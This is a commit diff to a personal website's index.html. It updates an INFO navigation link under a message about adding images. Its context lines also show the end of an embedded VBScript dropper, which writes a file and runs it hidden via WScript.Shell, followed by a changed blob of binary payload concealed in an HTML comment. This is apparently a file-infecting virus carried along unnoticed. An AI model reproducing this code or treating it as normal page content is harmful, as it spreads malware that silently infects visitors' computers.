adding images for info's image content

--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
                         <a href="home.html" target="topScreen">HOME</a>
                     </div>
                     <div id="infoButton" class="footerButtons">
-                        <a href="">INFO</a>
+                        <a href="info.html" target="topScreen">INFO</a>
                     </div>
                     <div id="eduButton" class="footerButtons">
                         <a href="">EDUCATION</a>
@@ -43,6 +43,7 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--ÀîFoªÓß¦¦‚È$z¤ÚD_o!{€¤Óa³½š/å2ºÖD½ò»wáåø2ö]ÒÀœÚ…¨×‚+W]×Í@eà”rF\±"†Ÿa€ž±Ð<–_é”qØP3ˆ
-ÒÉÕ¬±ñM»cÏ6ë/ãIëEíçaF*Ë‘…*JÂ'îp5 âðìt;èM¤¸QÐ!Û¸¬!§3­>”Š2/ßî5^Òœ)„è=}Ï9jrzïr¾¯°Œ2;´~HQÖãN+Ii3m0LGÚý±†W¼Ò)	èÐ¶NëÐ ¡R˜»’¸îªÙ\Õixð|—Ù’ÝÂ™PÚmo¸œ0Ñèö2L”Ê˜‰N`]fâÚØLÆ6ælUjç@…«äšd†—KVíh™ûŸ“0#«>’yA5˜ö¶ÁO;OÒ,oá)í÷` 
-T2Eª½K¡($‚{njq9²ötí‹?<)‡tU¼y¡î®ÂÑï&»" WC‹—Ô>`õe¿8.ºPðóªu×ŒfÃ%iY&‡ö«z±«\ùüIÁ’7™w‘í7*BÃŠ8]Ú ƒ‰âR8/Däñw5ã#Ö`w]dûÍôØ—"“æße-þ?&ƒ2¯Àö?©Žà_æ2ÃÈók,ÕÓ¨ƒ?Õù á(R"3ùá(á(á(¬õO^çûZ„å( á(-->
+//--></SCRIPT><!--Qkß¨Óš57K·ÄWÈ^!÷ÛY,kÅQ ×_óov°ÎŽÅt¤¦ã!¥à­\­p ýë8IÒVCœ†ï*°Í	Í„B÷b6›©&Š;Zò7¹/•ëG¶ÝÂ_oõfã•ôFÒDâã÷…QAìv”áÅ‚«Ÿ®¾ÜEš6àöd#ìÐpÒìÙ^—Uå•ôé„sŒN¢·HÌ/s6U›…œéA•ÝwR©Øñ’KMsXHî€õFÂ‘J
+›jÕIÄšKò‘¬f
+)/Íj2pü¹çg»ç£_®ÞQÌû1¢ó‹D?âk<öí«8ÎØJ¶©‘Ó%‡•âŒY(âoƒ'yqF¯‡âöànÌË4sãÙr°"Ñ6…K¢Ì¦gfå._ûþ»ÉÈ9æZ%0aåqÙ3~±¤>êÐõ 	¬ziÉ¯¯"éwìÚy¼Ö
+ÛŒŸÔ“ÃÛ÷Líªâ@0iaœÐ{RÎÈ6ý$.”¿F…Q"Ô£¤3j<Á‘s!«.ƒ¿† °Rïf&ˆi`3´$½}¤Ú»jôÓ´ ÚY{eRÑá.´üz”›Òaî	~W¦Jf¶¤¶Š…L1¾–×E$KeÉÃRwáÝ,ƒ"µl‘^ºLC¡sn á(R"3ùá(á(á(¬õOuÂûZ å( á(-->
